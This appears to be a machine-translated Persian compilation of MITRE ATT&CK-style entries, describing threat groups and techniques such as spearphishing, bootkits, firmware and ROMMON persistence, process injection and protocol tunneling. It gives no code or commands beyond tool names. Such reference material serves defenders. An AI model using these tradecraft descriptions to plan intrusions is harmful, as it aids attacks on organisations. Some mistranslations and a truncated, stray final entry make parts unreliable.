OilRig یک گروه تهدید ایرانی مشکوک است که حداقل از سال 2014 قربانیان خاورمیانه و بین المللی را هدف قرار داده است. این گروه بخش های مختلفی از جمله مالی، دولتی، انرژی، شیمیایی و مخابرات را هدف قرار داده است. به نظر می رسد این گروه حملات زنجیره تامین را انجام می دهد و از رابطه اعتماد بین سازمان ها برای حمله به اهداف اصلی خود استفاده می کند. FireEye ارزیابی می‌کند که این گروه از طرف دولت ایران بر اساس جزئیات زیرساختی که حاوی ارجاع به ایران، استفاده از زیرساخت‌های ایران و هدف‌گیری مطابق با منافع دولت-ملت است، کار می‌کند.

عملیات Wocao فعالیت های انجام شده توسط یک دشمن جاسوسی سایبری مستقر در چین را شرح داد. عملیات Wocao نهادهای داخل دولت، ارائه دهندگان خدمات مدیریت شده، انرژی، مراقبت های بهداشتی و بخش های فناوری را در چندین کشور از جمله چین، فرانسه، آلمان، بریتانیا و ایالات متحده هدف قرار داد. عملیات Wocao از TTPها و ابزارهای مشابه APT20 استفاده کرد که نشان دهنده همپوشانی احتمالی است.

Orangeworm گروهی است که حداقل از سال 2015 سازمان‌هایی را در بخش مراقبت‌های بهداشتی در ایالات متحده، اروپا و آسیا به منظور جاسوسی شرکتی هدف قرار داده است.

ممکن است دشمنان برای دسترسی به سیستم های قربانی پیام های فیشینگ ارسال کنند. تمام اشکال فیشینگ به صورت الکترونیکی مهندسی اجتماعی ارائه می‌شود. فیشینگ را می‌توان هدف قرار داد که به عنوان spearphishing شناخته می شود. در spearphishing، یک فرد، شرکت یا صنعت خاص مورد هدف دشمن قرار می گیرد. به طور کلی‌تر، دشمنان می‌توانند فیشینگ غیرهدفمندی را انجام دهند، مانند کمپین‌های هرزنامه انبوه بدافزار. دشمنان ممکن است ایمیل‌هایی حاوی پیوست‌ها یا پیوندهای مخرب به قربانیان ارسال کنند، معمولاً برای اجرای کدهای مخرب در سیستم‌های قربانی. فیشینگ همچنین ممکن است از طریق خدمات شخص ثالث، مانند پلتفرم های رسانه های اجتماعی، انجام شود. فیشینگ همچنین ممکن است شامل تکنیک‌های مهندسی اجتماعی، مانند ظاهر شدن به عنوان یک منبع قابل اعتماد باشد.

دشمنان ممکن است ایمیل‌های spearphishing را با یک پیوست مخرب ارسال کنند تا به سیستم‌های قربانی دسترسی پیدا کنند. ضمیمهSpearphishing یک نوع خاص از spearphishing است. ضمیمه Spearphishing با سایر اشکال spearphishing متفاوت است، زیرا از بدافزار متصل به ایمیل استفاده می‌کند. تمام اشکال spearphishing به صورت الکترونیکی مهندسی اجتماعی ارائه می‌شود که هدف آن یک فرد، شرکت یا صنعت خاص است. در این سناریو، دشمنان یک فایل را به ایمیل spearphishing ضمیمه می‌کنند و معمولاً برای اجرا بر روی User Execution تکیه می‌کنند. Spearphishing همچنین ممکن است شامل تکنیک های مهندسی اجتماعی، مانند خودنمایی به عنوان یک منبع قابل اعتماد باشد. گزینه‌های زیادی برای پیوست مانند اسناد مایکروسافت آفیس، فایل های اجرایی، PDF یا فایل های آرشیو شده وجود دارد. پس از باز کردن پیوست (و به طور بالقوه کلیک کردن بر روی حفاظت های گذشته)، محموله دشمن از یک آسیب پذیری سوء استفاده می کند یا مستقیماً در سیستم کاربر اجرا می شود. متن ایمیل spearphishing معمولاً سعی می‌کند دلیل قابل قبولی برای باز کردن فایل ارائه دهد و ممکن است توضیح دهد که چگونه می‌توان از حفاظت‌های سیستم برای انجام این کار دور زد. این ایمیل همچنین ممکن است حاوی دستورالعمل هایی در مورد نحوه رمزگشایی یک پیوست، مانند رمز عبور فایل فشرده، به منظور فرار از دفاع مرزی ایمیل باشد. دشمنان اغلب پسوندها و نمادهای فایل را دستکاری می‌کنند تا فایل‌های اجرایی پیوست شده را فایل‌های سند به نظر برسانند، یا فایل‌هایی که از یک برنامه سوءاستفاده می‌کنند، فایلی برای برنامه دیگری به نظر می‌رسند.

دشمنان ممکن است ایمیل های spearphishing را با یک پیوند مخرب ارسال کنند تا به سیستم های قربانی دسترسی پیدا کنند. Spearphishing با پیوند یک نوع خاص از spearphishing است. این روش با سایر اشکال spearphishing متفاوت است زیرا از پیوندها برای دانلود بدافزار موجود در ایمیل استفاده می کند، به جای پیوست کردن فایل های مخرب به خود ایمیل، برای جلوگیری از دفاعی که ممکن است پیوست های ایمیل را بررسی کند. Spearphishing همچنین ممکن است شامل تکنیک های مهندسی اجتماعی، مانند خودنمایی به عنوان یک منبع قابل اعتماد باشد. تمام اشکال spearphishing به صورت الکترونیکی مهندسی اجتماعی ارائه می شود که هدف آن یک فرد، شرکت یا صنعت خاص است. در این مورد، ایمیل های مخرب حاوی لینک هستند. به طور کلی، پیوندها با متن مهندسی اجتماعی همراه می‌شوند و از کاربر می‌خواهند که فعالانه روی یک URL کلیک یا کپی و در یک مرورگر جای‌گذاری کند و از اجرای کاربر استفاده کند. وب سایت بازدید شده ممکن است با استفاده از یک سوء استفاده، مرورگر وب را به خطر بیاندازد، یا از کاربر خواسته می شود برنامه ها، اسناد، فایل های فشرده یا حتی فایل های اجرایی را بسته به بهانه ایمیل در وهله اول بارگیری کند. دشمنان همچنین ممکن است پیوندهایی را شامل شوند که برای تعامل مستقیم با یک ایمیل خوان، از جمله تصاویر جاسازی شده برای سوء استفاده مستقیم از سیستم نهایی یا تأیید دریافت ایمیل (مانند اشکالات وب/بیکن های وب) در نظر گرفته شده است. پیوندها همچنین ممکن است کاربران را به برنامه‌های مخربی که برای سرقت نشانه‌های دسترسی برنامه‌ها طراحی شده‌اند، مانند نشانه‌های OAuth، هدایت کنند تا به برنامه‌ها و اطلاعات محافظت شده دسترسی پیدا کنند.

دشمنان ممکن است از طریق سرویس های شخص ثالث پیام های spearphishing ارسال کنند تا به سیستم‌های قربانی دسترسی پیدا کنند. spearphishingاز طریق سرویس یک نوع خاص از spearphishingاست. این روش با سایر اشکال spearphishingمتفاوت است زیرا از خدمات شخص ثالث به جای مستقیم از طریق کانال های ایمیل سازمانی استفاده می کند. تمام اشکال spearphishing به صورت الکترونیکی مهندسی اجتماعی ارائه می شود که هدف آن یک فرد، شرکت یا صنعت خاص است. در این سناریو، دشمنان پیام‌هایی را از طریق سرویس‌های مختلف رسانه‌های اجتماعی، ایمیل شخصی و سایر سرویس‌های غیر سازمانی ارسال می‌کنند. این سرویس ها به احتمال زیاد سیاست امنیتی کمتری نسبت به یک شرکت دارند. مانند بسیاری از انواع spearphishing، هدف ایجاد ارتباط با هدف یا جلب علاقه هدف به طریقی است. دشمنان حساب‌های شبکه‌های اجتماعی جعلی ایجاد می‌کنند و به کارکنان برای فرصت‌های شغلی بالقوه پیام می‌دهند. انجام این کار دلیل قابل قبولی برای پرسیدن در مورد سرویس‌ها، خط مشی‌ها و نرم افزارهایی که در یک محیط اجرا می شوند، می دهد. سپس دشمن می تواند پیوندهای مخرب یا پیوست‌ها را از طریق این سرویس ها ارسال کند. یک مثال متداول این است که از طریق رسانه‌های اجتماعی با یک هدف ارتباط برقرار کنید، سپس محتوا را به یک سرویس ایمیل شخصی هدف که در رایانه کاری خود استفاده می کند، ارسال کنید. این به حریف اجازه می‌دهد تا برخی از محدودیت‌های ایمیل در حساب کاری را دور بزند و هدف احتمال بیشتری دارد که فایل را باز کند زیرا چیزی است که انتظارش را داشت. اگر محموله آن طور که انتظار می رود کار نکند، دشمن می تواند به ارتباطات عادی ادامه دهد و با هدف در مورد نحوه کارکرد آن عیب یابی کند.

دشمنان ممکن است پیام‌های فیشینگ ارسال کنند تا اطلاعات حساسی را که می‌تواند در هنگام هدف‌گیری استفاده شود، استخراج کنند. فیشینگ برای اطلاعات، تلاش برای فریب اهداف برای افشای اطلاعات، اغلب اعتبارنامه‌ها یا سایر اطلاعات قابل اجرا است. فیشینگ برای اطلاعات با فیشینگ متفاوت است زیرا هدف جمع‌آوری داده‌ها از قربانی به جای اجرای کد مخرب است.

دشمنان ممکن است از طریق سرویس‌های شخص ثالث پیام‌هایspearphishing ارسال کنند تا اطلاعات حساسی را که می‌توان در طول هدف‌گیری مورد استفاده قرار داد استخراج کرد. Spearphishing برای اطلاعات تلاشی برای فریب دادن اهداف به افشای اطلاعات، اغلب اعتبارنامه‌ها یا سایر اطلاعات قابل اجرا است. Spearphishing برای اطلاعات اغلب شامل تکنیک‌های مهندسی اجتماعی می‌شود، مانند معرفی به‌عنوان منبعی با دلیلی برای جمع‌آوری اطلاعات (مثلاً ایجاد حساب‌ها یا به خطر انداختن حساب‌ها) و/یا ارسال پیام‌های متعدد و به ظاهر فوری. تمام اشکال spearphishing به صورت الکترونیکی مهندسی اجتماعی ارائه می شود که هدف آن یک فرد، شرکت یا صنعت خاص است. در این سناریو، دشمنان از طریق سرویس‌های مختلف رسانه‌های اجتماعی، ایمیل شخصی و سایر سرویس‌های غیر سازمانی، پیام‌هایی را ارسال می‌کنند. این سرویس‌ها به احتمال زیاد سیاست امنیتی کمتری نسبت به یک شرکت دارند. مانند بسیاری از انواع spearphishing، هدف ایجاد ارتباط با هدف یا جلب علاقه هدف به طریقی است. دشمنان ممکن است حساب‌های رسانه‌های اجتماعی جعلی ایجاد کنند و برای فرصت‌های شغلی بالقوه به کارکنان پیام دهند. انجام این کار دلیل قابل قبولی برای پرسش در مورد خدمات، خط مشی‌ها و اطلاعات در مورد محیط آنها می‌دهد. دشمنان همچنین ممکن است از اطلاعات تلاش‌های شناسایی قبلی (مثلاً: رسانه‌های اجتماعی یا وب‌سایت‌های متعلق به قربانیان جستجو) برای ایجاد فریب‌های متقاعدکننده و باورپذیر استفاده کنند.

دشمنان ممکن است پیام‌های spearphishingرا با یک پیوست مخرب ارسال کنند تا اطلاعات حساسی را که می‌توان در طول هدف‌گیری استفاده کرد، استخراج کرد. spearphishing برای اطلاعات تلاشی برای فریب دادن اهداف به افشای اطلاعات، اغلب اعتبارنامه‌ها یا سایر اطلاعات قابل اجرا است. spearphishingبرای اطلاعات اغلب شامل تکنیک‌های مهندسی اجتماعی می‌شود، مانند معرفی به‌عنوان منبعی با دلیلی برای جمع‌آوری اطلاعات (مثلاً ایجاد حساب‌ها یا به خطرانداختن حساب‌ها)و یا ارسال پیام‌های متعدد و به ظاهر فوری. تمام اشکال spearphishing به صورت الکترونیکی مهندسی اجتماعی ارائه می‌شود که هدف آن یک فرد، شرکت یا صنعت خاص است. در این سناریو، دشمنان یک فایل را به ایمیل spearphishingپیوست می‌کنند و معمولاً به گیرنده تکیه می‌کنند که اطلاعات را پر می‌کند و سپس فایل را برمی‌گرداند. متن ایمیل spearphishingمعمولاً سعی می‌کند دلیل قابل قبولی برای پر کردن فایل ارائه دهد، مانند درخواست اطلاعات از یک همکار تجاری. دشمنان همچنین ممکن است از اطلاعات تلاش‌های شناسایی قبلی (مثلاً جستجو در وب‌سایت‌ها/دامنه‌های باز یا جستجو در وب‌سایت‌های متعلق به قربانی) برای ایجاد فریب‌های متقاعدکننده و باورپذیر استفاده کنند.

دشمنان ممکن است پیام‌های spearphishingرا با یک پیوند مخرب ارسال کنند تا اطلاعات حساسی را که می‌تواند در هنگام هدف‌گیری استفاده شود، استخراج کند. spearphishing برای اطلاعات تلاشی برای فریب دادن اهداف به افشای اطلاعات، اغلب اعتبارنامه‌ها یا سایر اطلاعات قابل اجرا است. spearphishingبرای اطلاعات اغلب شامل تکنیک‌های مهندسی اجتماعی می‌شود، مانند معرفی به‌عنوان منبعی با دلیلی برای جمع‌آوری اطلاعات (مثلاً ایجاد حساب‌ها یا به خطر انداختن حساب‌ها) و/یا ارسال پیام‌های متعدد و به ظاهر فوری. تمام اشکال spearphishingبه صورت الکترونیکی مهندسی اجتماعی ارائه می‌شود که هدف آن یک فرد، شرکت یا صنعت خاص است. در این سناریو، ایمیل‌های مخرب حاوی پیوندهایی هستند که عموماً با متن مهندسی اجتماعی همراه هستند تا کاربر را ترغیب کنند تا به طور فعال یک URLرا کلیک یا کپی و در مرورگر جای‌گذاری کند. وب سایت داده شده ممکن است از نظر ظاهری بسیار شبیه به یک سایت قانونی باشد و دارای یک URL حاوی عناصری از سایت واقعی باشد. از وب سایت جعلی، اطلاعات در فرم های وب جمع آوری شده و برای مهاجم ارسال می‌شود. دشمنان همچنین ممکن است از اطلاعات تلاش‌های شناسایی قبلی (مثلاً جستجو در وب‌سایت‌ها/دامنه‌های باز یا جستجو در وب‌سایت‌های متعلق به قربانی) برای ایجاد فریب‌های متقاعدکننده و باورپذیر استفاده کنند.

دشمنان ممکن است از مکانیسم‌های Boot Pre-OS به عنوان راهی برای ایجاد پایداری در یک سیستم سوء استفاده کنند. در طول فرآیند بوت شدن کامپیوتر، سیستم عامل و سرویس های راه اندازی مختلف قبل از سیستم عامل بارگذاری می شوند. این برنامه ها جریان اجرا را قبل از اینکه سیستم عامل کنترل کند کنترل می کنند. دشمنان ممکن است داده ها را در درایورهای بوت یا سیستم عامل مانند BIOS و UEFI بازنویسی کنند تا روی سیستم ها در یک لایه زیر سیستم عامل باقی بمانند. شناسایی این امر به ویژه دشوار است زیرا بدافزار در این سطح توسط دفاع های مبتنی بر نرم افزار میزبان شناسایی نمی شود.

دشمنان ممکن است سفت‌افزار سیستم را تغییر دهند تا در سیستم‌ها باقی بماند. ( BIOSسیستم ورودی/خروجی اولیه) و رابط میان‌افزار توسعه‌پذیر یکپارچه (UEFI )یا رابط سفت‌افزار توسعه‌پذیر ( EFI) نمونه‌هایی از میان‌افزار سیستم هستند که به عنوان رابط نرم‌افزاری بین سیستم عامل عمل می‌کنند. و سخت افزار کامپیوتر. سیستم عامل سیستم مانند BIOS و (UEFI ) زیربنای عملکرد یک کامپیوتر است و ممکن است توسط یک دشمن برای انجام یا کمک به فعالیت های مخرب اصلاح شود. قابلیت‌هایی برای بازنویسی میان‌افزار سیستم وجود دارد، که ممکن است به دشمنان پیچیده ابزاری برای نصب به‌روزرسانی‌های سیستم‌افزار مخرب به‌عنوان وسیله‌ای برای تداوم در سیستمی که تشخیص آن ممکن است دشوار باشد، بدهد.

دشمنان ممکن است سخت‌افزار جزء را تغییر دهند تا در سیستم‌ها باقی بماند. برخی از دشمنان ممکن است از ابزارهای پیچیده برای به خطر انداختن اجزای رایانه و نصب سیستم عامل مخرب استفاده کنند که کدهای دشمن را خارج از سیستم عامل و سیستم عامل اصلی سیستم یا بایوس اجرا می کند. این تکنیک ممکن است شبیه به سیستم سخت‌افزار باشد، اما روی سایر اجزا/دستگاه‌های سیستم که ممکن است توانایی یا سطح بررسی یکپارچگی یکسانی نداشته باشند، انجام می‌شود. سخت‌افزار مؤلفه‌های مخرب می‌تواند یک سطح دائمی از دسترسی به سیستم‌ها را علی‌رغم شکست‌های معمول بالقوه در حفظ دسترسی و تصاویر دوباره هارد دیسک، و همچنین راهی برای فرار از دفاع مبتنی بر نرم‌افزار میزبان و بررسی‌های یکپارچگی فراهم کند.

دشمنان ممکن است از بوت کیت ها برای تداوم در سیستم ها استفاده کنند. بوت کیت ها در یک لایه زیر سیستم عامل قرار دارند و ممکن است انجام اصلاح کامل را دشوار کنند، مگر اینکه سازمانی مشکوک به استفاده از آن باشد و بتواند مطابق با آن عمل کند. بوت کیت یک نوع بدافزار است که بخش‌های بوت یک هارد دیسک، از جمله (MBR) و (VBR) را تغییر می‌دهد. MBR بخشی از دیسک است که برای اولین بار پس از تکمیل اولیه سازی سخت افزار توسط BIOS بارگذاری می شود. محل بوت لودر است. دشمنی که دسترسی خام به درایو راه‌اندازی دارد، ممکن است این ناحیه را بازنویسی کند و اجرا را در هنگام راه‌اندازی از بوت‌لودر معمولی به کد دشمن منحرف کند. MBR کنترل فرآیند بوت را به VBR می دهد. مشابه مورد MBR، دشمنی که دسترسی خام به درایو بوت دارد، می‌تواند VBR را بازنویسی کند تا اجرا را در هنگام راه‌اندازی به کد دشمن منحرف کند.

دشمنان ممکن است از نمایشگرROM (ROMMON)با بارگذاری یک سفت‌افزار غیرمجاز با کد حریف برای ارائه دسترسی مداوم و دستکاری رفتار دستگاه که تشخیص آن دشوار است، سوء استفاده کنند. ROMMON یک سفت‌افزار دستگاه شبکه سیسکو است که به‌عنوان بوت‌لودر، تصویر راه‌اندازی یا کمک‌کننده راه‌اندازی برای مقداردهی اولیه سخت‌افزار و نرم‌افزار هنگام روشن شدن یا بازنشانی پلت‌فرم عمل می‌کند. مشابه با TFTP Boot، دشمن ممکن است تصویر ROMMON را به صورت محلی یا از راه دور (به عنوان مثال، از طریق TFTP) با کد دشمن ارتقا دهد و دستگاه را مجددا راه اندازی کند تا تصویر ROMMON موجود را بازنویسی کند. این به دشمنان ابزاری را برای به روز رسانی ROMMON برای به دست آوردن پایداری در یک سیستم به روشی که ممکن است تشخیص آن دشوار باشد، ارائه می دهد.

دشمنان ممکن است از راه‌اندازی شبکه برای بارگیری یک سیستم عامل شبکه غیرمجاز از یک سرور پروتکل انتقال فایل ( TFTP)استفاده کنند. TFTP بوت راه‌اندازی شبکه معمولاً توسط مدیران شبکه برای بارگیری تصاویر دستگاه شبکه با پیکربندی از یک سرور مدیریت متمرکز استفاده می‌شود. Netbooting یکی از گزینه‌های توالی بوت است و می‌توان از آن برای متمرکز کردن، مدیریت و کنترل تصاویر دستگاه استفاده کرد. دشمنان ممکن است پیکربندی دستگاه شبکه را دستکاری کنند که استفاده از یک سرور TFTP مخرب را مشخص می‌کند، که ممکن است همراه با Modify System Image برای بارگذاری تصویر تغییر یافته در راه‌اندازی یا بازنشانی دستگاه استفاده شود. تصویر غیرمجاز به دشمنان اجازه می‌دهد تا پیکربندی دستگاه را تغییر دهند، قابلیت‌های مخرب را به دستگاه اضافه کنند و درهای پشتی را برای حفظ کنترل دستگاه شبکه و در عین حال به حداقل رساندن شناسایی از طریق استفاده از یک عملکرد استاندارد، معرفی کنند. این تکنیک مشابه ROMMONkit است و ممکن است منجر به اجرای یک تصویر تغییر یافته توسط دستگاه شبکه شود.

دشمن در تلاش است تا مجوزهای سطح بالاتر را به دست آورد. افزایش امتیاز شامل تکنیک هایی است که دشمنان برای به دست آوردن مجوزهای سطح بالاتر در یک سیستم یا شبکه استفاده می کنند. دشمنان اغلب می‌توانند وارد شبکه‌ای با دسترسی غیرمجاز شده و آن را کاوش کنند، اما برای پیگیری اهداف خود به مجوزهای بالا نیاز دارند. رویکردهای رایج استفاده از نقاط ضعف سیستم، پیکربندی نادرست و آسیب پذیری ها است. نمونه‌هایی از دسترسی بالا عبارتند از: سطح سیستم / ریشه، مدیر محلی، حساب کاربری با دسترسی ادمین، حساب های کاربری با دسترسی به سیستم خاص یا انجام عملکرد خاصی این تکنیک‌ها اغلب با تکنیک‌های Persistence همپوشانی دارند، زیرا ویژگی‌های سیستم‌عامل که به دشمن اجازه می‌دهد تداوم داشته باشد، می‌توانند در یک زمینه بالا اجرا شوند.

دشمنان ممکن است برای فرار از دفاع مبتنی بر فرآیند و همچنین افزایش امتیازات، کد را به فرآیندها تزریق کنند. تزریق فرآیند روشی برای اجرای کد دلخواه در فضای آدرس یک فرآیند زنده جداگانه است. اجرای کد در زمینه یک فرآیند دیگر ممکن است امکان دسترسی به حافظه فرآیند، منابع سیستم/شبکه و احتمالاً امتیازات بالاتر را فراهم کند. اجرای از طریق تزریق فرآیند نیز ممکن است از شناسایی محصولات امنیتی جلوگیری کند زیرا اجرا تحت یک فرآیند قانونی پنهان شده است. راه های مختلفی برای تزریق کد به یک فرآیند وجود دارد که بسیاری از آنها از عملکردهای قانونی سوء استفاده می کنند. این پیاده‌سازی‌ها برای هر سیستم‌عامل اصلی وجود دارد، اما معمولاً پلتفرم خاصی هستند. نمونه‌های پیچیده‌تر ممکن است چندین فرآیند تزریق را برای بخش‌بندی ماژول‌ها انجام دهند و با استفاده از لوله‌های نام‌گذاری شده یا دیگر مکانیسم‌های ارتباط بین فرآیندی (IPC ) به عنوان کانال ارتباطی، از تشخیص بیشتر فرار کنند.

ممکن است دشمنان سعی کنند به اطلاعات دقیق در مورد خط مشی رمز عبور استفاده شده در شبکه سازمانی یا محیط ابری دسترسی پیدا کنند. خط‌مشی‌های گذرواژه راهی برای اعمال رمزهای عبور پیچیده است که حدس زدن یا شکستن آن‌ها از طریق Brute Force دشوار است. این اطلاعات ممکن است به حریف کمک کند تا فهرستی از رمزهای عبور رایج ایجاد کند و حملات فرهنگ لغت و/یا brute force را که به این خط مشی پایبند است راه اندازی کند (مثلاً اگر حداقل طول رمز عبور باید 8 باشد، پس گذرواژه هایی مانند «pass123» را امتحان نکنید؛ بررسی نکنید. برای بیش از 3-4 رمز عبور در هر حساب، اگر قفل روی 6 تنظیم شده باشد تا حساب ها را قفل نکنید).

دشمنان ممکن است تلاش کنند اطلاعاتی در مورد دستگاه‌های جانبی متصل و اجزای متصل به یک سیستم کامپیوتری جمع آوری کنند. دستگاه‌های جانبی می‌توانند شامل منابع کمکی باشند که از انواع عملکردها مانند صفحه کلید، چاپگر، دوربین، کارت خوان هوشمند یا حافظه قابل جابجایی پشتیبانی می کنند. این اطلاعات ممکن است برای افزایش آگاهی آنها از سیستم و محیط شبکه استفاده شود یا ممکن است برای اقدامات بعدی مورد استفاده قرار گیرد.

ممکن است دشمنان سعی کنند اطلاعاتی در مورد فرآیندهای در حال اجرا در یک سیستم به دست آورند. اطلاعات به‌دست‌آمده می‌تواند برای به دست آوردن درک درستی از نرم‌افزار/برنامه‌های رایج در حال اجرا بر روی سیستم‌های درون شبکه استفاده شود. دشمنان ممکن است از اطلاعات Process Discovery در حین کشف خودکار برای شکل دادن به رفتارهای بعدی استفاده کنند، از جمله اینکه آیا دشمن به طور کامل هدف را آلوده می کند و/یا اقدامات خاصی را انجام می دهد. در محیط‌های ویندوز، دشمنان می‌توانند جزئیات مربوط به فرآیندهای در حال اجرا را با استفاده از ابزار Tasklist از طریق cmd یا Get-Process از طریق PowerShell به دست آورند. اطلاعات مربوط به فرآیندها را می توان از خروجی فراخوانی های Native API مانند CreateToolhelp32Snapshot نیز استخراج کرد. در مک و لینوکس، این کار با دستور ps انجام می شود. همچنین ممکن است دشمنان فرآیندها را از طریق proc / برشمارند.

دشمنان ممکن است ارتباطات شبکه را به و از یک سیستم قربانی در یک پروتکل جداگانه تونل کنند تا از شناسایی/فیلتر کردن شبکه جلوگیری کنند و/یا امکان دسترسی به سیستم‌های غیرقابل دسترس را فراهم کنند. تونل زنی شامل کپسوله کردن صریح یک پروتکل در پروتکل دیگری است. این رفتار ممکن است با ادغام با ترافیک موجود، ترافیک مخرب را پنهان کند و/یا یک لایه خارجی رمزگذاری (شبیه بهVPN ایجاد کند. تونل‌سازی همچنین می‌تواند مسیریابی بسته‌های شبکه را فعال کند که در غیر این صورت به مقصد مورد نظر خود نمی‌رسند، مانند SMB، RDP، یا سایر ترافیک‌هایی که توسط دستگاه‌های شبکه فیلتر می‌شوند یا از طریق اینترنت هدایت نمی‌شوند. ابزارهای مختلفی برای کپسوله کردن یک پروتکل در پروتکل دیگر وجود دارد. برای مثال، دشمنان ممکن است تونل‌سازی SSH را انجام دهند (همچنین به عنوان ارسال پورت SSH شناخته می‌شود)، که شامل ارسال داده‌های دلخواه بر روی یک تونل رمزگذاری‌شده SSH است.پروتکل تونل همچنین ممکن است توسط دشمنان در طول وضوح پویا مورد سوء استفاده قرار گیرد. که به عنوان DNS از طریق HTTPS (DoH) شناخته می شود، پرس و جوهایی برای حل زیرساخت C2ممکن است در بسته های HTTPS رمزگذاری شده کپسوله شوند.همچنین ممکن است دشمنان از Protocol Tunneling در ارتباط با پروکسی و/یا جعل هویت پروتکل برای پنهان کردن بیشتر ارتباطات و زیرساخت C2 استفاده کنند.

دشمنان ممکن است از یک پروکسی اتصال برای هدایت ترافیک شبکه بین سیستم ها استفاده کنند یا به عنوان واسطه ای برای ارتباطات شبکه به سرور فرمان و کنترل عمل کنند تا از اتصال مستقیم به زیرساخت خود جلوگیری کنند. ابزارهای زیادی وجود دارند که هدایت ترافیک را از طریق پراکسی ها یا تغییر مسیر پورت امکان پذیر می کنند، از جمله HTRAN، ZXProxy و ZXPortMap دشمنان از این نوع پراکسی ها برای مدیریت و کنترل ارتباطات، کاهش تعداد اتصالات شبکه خروجی همزمان، ایجاد انعطاف پذیری در مواجهه با از دست دادن اتصال، یا سوار شدن بر مسیرهای ارتباطی مورد اعتماد موجود بین قربانیان برای جلوگیری از سوء ظن استفاده می‌کنند. دشمنان ممکن است چندین پروکسی را به هم متصل کنند تا منبع ترافیک مخرب را بیشتر پنهان کنند. دشمنان همچنین می‌توانند از طرح‌های مسیریابی در شبکه‌های تحویل محتوا ( CDN) برای فرمان پروکسی و کنترل ترافیک استفاده کنند.

Patchwork یک گروه جاسوسی سایبری است که برای اولین بار در دسامبر 2015 مشاهده شد. در حالی که این گروه به طور قطعی نسبت داده نشده است، شواهد غیرواقعی نشان می دهد که این گروه ممکن است یک نهاد طرفدار هند یا هند باشد. مشاهده شده است که Patchwork صنایع مرتبط با آژانس های دیپلماتیک و دولتی را هدف قرار می دهد. بسیاری از کدهای استفاده شده توسط این گروه از انجمن های آنلاین کپی و جایگذاری شده است. Patchwork همچنین در مارس و آوریل 2018 کمپین‌هایspearphishing را با هدف هدف قرار دادن گروه‌های اندیشکده ایالات متحده مشاهده شد.

PittyTiger یک گروه تهدید است که گمان می رود در خارج از چین فعالیت می کند و از انواع مختلف بدافزار برای حفظ فرمان و کنترل استفاده می کند.

PLATINUM یک گروه فعالیت است که حداقل از سال 2009 قربانیان را هدف قرار داده است. این گروه بر اهداف مرتبط با دولت ها و سازمان های مرتبط در جنوب و جنوب شرق آسیا متمرکز شده است.

Poseidon Group یک گروه تهدید پرتغالی زبان است که حداقل از سال 2005 فعال بوده است. این گروه سابقه استفاده از اطلاعات استخراج شده از قربانیان برای باج‌گیری از شرکت‌های قربانی را برای عقد قرارداد با Poseidon Group به عنوان یک شرکت امنیتی دارد.

PROMETHIUM یک گروه فعالیت متمرکز بر جاسوسی است که حداقل از سال 2012 فعال بوده است. این گروه عملیات های جهانی را با تاکید زیادی بر اهداف ترکیه انجام داده است. PROMETHIUM شباهت خود را با گروه فعالیت دیگری به نام NEODYMIUM به دلیل همپوشانی ویژگی های قربانی و کمپین نشان داده است.

پاتر پاندا یک گروه تهدید چینی است که به واحد 61486 از دوازدهمین دفتر اداره سوم ستاد کل ارتش (GSD) نسبت داده شده است.

تداوم امنیت سایبری زمانی اتفاق می‌افتد که یک عامل تهدید به‌رغم ایجاد اختلالاتی مانند راه‌اندازی مجدد یا تغییر اعتبار، به طور محتاطانه دسترسی طولانی‌مدت به سیستم‌ها را حفظ کند. بازیگران بد می توانند یک ایمپلنت یا "خرد" بگذارند که هم از راه حل های آنتی ویروس خودکار فرار کند و هم بدافزار بیشتری را راه اندازی کند.

افزایش امتیاز نوعی حمله شبکه ای است که برای دسترسی غیرمجاز به سیستم ها در یک محیط امنیتی استفاده می شود. مهاجمان با یافتن نقاط ضعف در دفاع یک سازمان و دسترسی به یک سیستم شروع می کنند

ممکن است دشمنان با رجیستری ویندوز تعامل داشته باشند تا اطلاعات مربوط به سیستم، پیکربندی و نرم افزار نصب شده را جمع آوری کنند. رجیستری حاوی مقدار قابل توجهی اطلاعات در مورد سیستم عامل، پیکربندی، نرم افزار و امنیت است. اطلاعات را می‌توان به راحتی با استفاده از ابزارRegجستجو کرد، اگرچه ابزارهای دیگری برای دسترسی بهRegistryوجود دارد. برخی از اطلاعات ممکن است به دشمنان برای پیشبرد عملیات خود در یک شبکه کمک کند. دشمنان ممکن است از اطلاعاتQuery Registryدر حین کشف خودکار برای شکل دادن به رفتارهای بعدی استفاده کنند، از جمله اینکه آیا دشمن به طور کامل هدف را آلوده می‌کند و یا اقدامات خاصی را انجام می‌دهد.

یک حمله فیشینگ که از یک کد QR مخرب به جای پیوند یا پیوست استفاده می کند.

شناسایی شامل تکنیک‌هایی است که دشمنان به طور فعال یا غیرفعال اطلاعاتی را جمع آوری می‌کنند که می‌تواند برای پشتیبانی از هدف‌گیری مورد استفاده قرار گیرد. چنین اطلاعاتی ممکن است شامل جزئیات سازمان قربانی، زیرساخت یا کارکنان/پرسنل باشد. این اطلاعات می‌تواند توسط دشمن برای کمک به سایر مراحل چرخه حیات دشمن استفاده شود، مانند استفاده از اطلاعات جمع‌آوری شده برای برنامه‌ریزی و اجرای دسترسی اولیه، محدوده و اولویت‌بندی اهداف پس از سازش یا هدایت و رهبری.

توسعه منابع تکنیک‌هایی هستند که شامل ایجاد، خرید، یا به خطر انداختن و سرقت منابع توسط دشمنان می‌شود که می‌تواند برای پشتیبانی از هدف گیری مورد استفاده قرار گیرد. چنین منابعی شامل زیرساخت‌ها، حساب‌ها یا قابلیت‌ها است. این منابع می‌توانند توسط دشمن برای کمک به سایر مراحل چرخه حیات دشمن استفاده شوند، مانند استفاده از دامنه‌های خریداری شده برای پشتیبانی از فرمان و کنترل، حساب‌های ایمیل برای فیشینگ به عنوان بخشی از دسترسی اولیه، یا سرقت گواهی‌های امضای شده.

دشمنان ممکن است با کپی کردن بدافزار در رسانه‌های قابل جابجایی و استفاده از ویژگی‌هایAutorun به سیستم‌ها، احتمالاً آن‌هایی که در شبکه‌های قطع شده یا دارای شکاف هوا هستند، وارد شوند. در موردLateral Movement، این ممکن است از طریق اصلاح فایل‌های اجرایی ذخیره‌شده در رسانه‌های قابل جابجایی یا با کپی کردن بدافزار و تغییر نام آن به شکل فایلی قانونی برای فریب کاربران برای اجرای آن در یک سیستم جداگانه رخ دهد. در مورد دسترسی اولیه، این ممکن است از طریق دستکاری دستی رسانه، اصلاح سیستم‌هایی که برای قالب‌بندی اولیه رسانه استفاده می‌شوند، یا تغییر در خود سیستم عامل رسانه رخ دهد.

عبارت است از قرار گرفتن در معرض شرایطی که پتانسیل آسیب رسانی دارد. بالفعل شدن خطرات مانند نزدیک شدن به دستگاه در حال کار.

